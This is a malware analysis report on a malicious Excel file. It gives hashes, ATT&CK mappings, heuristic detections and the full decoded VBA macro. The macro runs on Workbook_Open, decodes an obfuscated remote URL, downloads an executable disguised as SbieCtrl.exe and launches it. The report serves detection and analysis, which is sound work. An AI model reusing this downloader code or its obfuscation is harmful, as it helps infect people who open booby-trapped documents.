Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 afc0ee35dd291d78…

MALICIOUS

Office (OLE)

778.0 KB Created: 2014-05-06 06:56:25 Authoring application: Microsoft Excel First seen: 2015-11-28
MD5: e17d03b09591d2044277401095894a97 SHA-1: 41c026881e513206343b20924f4f673dbf1371f5 SHA-256: afc0ee35dd291d784e4b81ee770d657339cd08071cdfb5ee38c74a4893c86501
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

This Excel document contains VBA macros, including a Workbook_Open macro, designed to lure the user into enabling content. The script uses ShellExecuteA and URLDownloadToFileA APIs, indicating an intent to download and execute a second-stage payload from a remote source. The obfuscated function names and API calls suggest a malicious downloader.

Heuristics 7

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm Lib "urlmon" Alias "URLDownloadToFileA" (ByVal GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As Long, ByVal CbSObrGcPYwrUWDWdlZFOPNSqwEivuKO As String, ByVal QIixpZHJeGLZVERrsScoQkOnFfFQKdLjS As String, ByVal djfrHWegpMHlnTZtBqVRRQVGNUl As Long, ByVal LKbQTLkNsqXMhXOcmUUIIjsEhAgDViVSM As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4235 bytes
SHA-256: 8e7e3b9b02c4b7882aca003abda9cc75c9fbdaec17f0a9ddc808c9e9df9cee75
Detection
ClamAV: No threats found
Obfuscation or payload: likely
31 of 58 identifiers look randomly generated (e.g. 'GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Welcome to My Macro
#If VBA7 Then
Private Declare PtrSafe Function GFNGhdrghsDFBDFgbdgF Lib "shell32" Alias "ShellExecuteA" (ByVal fczjtzvHXYuwFdKoDkqJRHniihmWPWBcNe As Long, ByVal hkcAeIsodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLM As String, ByVal VgbETmGZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXz As String, ByVal hykoOpAuMJgCbSObrGcPYwrUWDWdlZFOPN As String, ByVal SqwEivuKOQIixpZHJeGLZVERrsScoQkOnFfFQKdLjSdj As String, ByVal frHWegpMHlnTZtBqVRRQVGNUlLKbQTLkNsqXMhXOcmUUIIjs As Long) As Long
Private Declare PtrSafe Function sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm Lib "urlmon" Alias "URLDownloadToFileA" (ByVal GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As Long, ByVal CbSObrGcPYwrUWDWdlZFOPNSqwEivuKO As String, ByVal QIixpZHJeGLZVERrsScoQkOnFfFQKdLjS As String, ByVal djfrHWegpMHlnTZtBqVRRQVGNUl As Long, ByVal LKbQTLkNsqXMhXOcmUUIIjsEhAgDViVSM As Long) As Long
#Else
Private Declare Function GFNGhdrghsDFBDFgbdgF Lib "shell32" Alias "ShellExecuteA" (ByVal fczjtzvHXYuwFdKoDkqJRHniihmWPWBcNe As Long, ByVal hkcAeIsodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLM As String, ByVal VgbETmGZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXz As String, ByVal hykoOpAuMJgCbSObrGcPYwrUWDWdlZFOPN As String, ByVal SqwEivuKOQIixpZHJeGLZVERrsScoQkOnFfFQKdLjSdj As String, ByVal frHWegpMHlnTZtBqVRRQVGNUlLKbQTLkNsqXMhXOcmUUIIjs As Long) As Long
Private Declare Function sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm Lib "urlmon" Alias "URLDownloadToFileA" (ByVal GZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As Long, ByVal CbSObrGcPYwrUWDWdlZFOPNSqwEivuKO As String, ByVal QIixpZHJeGLZVERrsScoQkOnFfFQKdLjS As String, ByVal djfrHWegpMHlnTZtBqVRRQVGNUl As Long, ByVal LKbQTLkNsqXMhXOcmUUIIjsEhAgDViVSM As Long) As Long
#End If
Dim kcAeIsodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETmG As String, ZUJpyzxCngnRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJg As String, CbSObrGcPYwrUWDWdlZFOP As String, ZVERrsScoQkOnFfFQKdLjSdjfrHWegpMHlnTZtB As String, qVRRQVGNUlLKbQTLkNsqXMhXOcmUUIIjs As String, EhAgDViVSMfczjtzvHXYuwFdKoDkqJRHniihmWPWB As String, HXYuwFdKoDkqJRHniihmWPWBcNehkcAeIsodxofsCmlYKmIU As String, jQiTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCng As String
Private Function cNehkcAeIsodxofsCmlYKmIUjQ(iTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCngn)
    Dim RfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbSObrGcPYw, rUWDWdlZFOPNSqwEivuKOQIixpZHJeGLZVERrsScoQ, kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU
y = Len(iTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCngn)
For x = y To 3 - 2 Step 2 - 3
     nRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbS = Mid(iTXymkewtPlKPLXbqLMVgbETmGZUJpyzxCngn, x, 30 - 29)
     ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ = ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ & nRfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbS
Next
 For rUWDWdlZFOPNSqwEivuKOQIixpZHJeGLZVERrsScoQ = 5 - 4 To Len(ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ)
        RfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbSObrGcPYw = Mid(ObrGcPYwrUWDWdlZFOPNSqwEivuKOQIixpZHJ, rUWDWdlZFOPNSqwEivuKOQIixpZHJeGLZVERrsScoQ, 14 - 13)
        kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU = kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU & Chr(Asc(RfeuyAsRhYJrtNqvIToBpbCYXzhykoOpAuMJgCbSObrGcPYw) - 7 + 6)
    Next
    cNehkcAeIsodxofsCmlYKmIUjQ = kOnFfFQKdLjSdjfrHWegpMHlnTZtBqVRRQVGNU
End Function
Private Sub NSqwEivuKOQIixpZHJeGL()
sodxofsCmlYKmIUjQiTXymkewtPlKPLXbqLMVgbETm 0, cNehkcAeIsodxofsCmlYKmIUjQ("fyf/qvuft020fnbo/dfebxop00;quui"), "C:\Users\Public\Documents" & "\" & cNehkcAeIsodxofsCmlYKmIUjQ("fyf/msuDfjcT"), 0, 0
GFNGhdrghsDFBDFgbdgF 0, "open", "C:\Users\Public\Documents" & "\" & cNehkcAeIsodxofsCmlYKmIUjQ("fyf/msuDfjcT"), "", vbNullString, vbNormalFocus
End Sub
Private Sub Workbook_Open()
NSqwEivuKOQIixpZHJeGL
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.